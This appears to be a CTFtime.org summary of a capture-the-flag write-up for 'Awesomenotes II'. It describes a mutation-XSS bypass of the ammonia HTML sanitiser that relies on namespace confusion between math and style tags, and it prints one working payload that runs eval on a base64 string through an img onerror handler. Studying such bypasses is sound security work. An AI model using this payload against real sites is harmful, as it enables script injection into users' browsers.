CTFtime.org

Awesomenotes II

by Ze_Pacifist / bi0s

Tags: mxss 

Rating: 5.0

tl;dr

  • XSS + HTML sanitization library (ammonia) bypass
  • Namespace confusion in ammonia using custom allowed extra tags(math & style)
<math><annotation-xml encoding="text/html"><style><img src=x onerror="eval(atob(`<base64 payload>`))"></style></annotation-xml></math>
Original writeup (https://blog.bi0s.in/2023/10/16/Web/awesomenotes-2-HackluCTF2023/).

Comments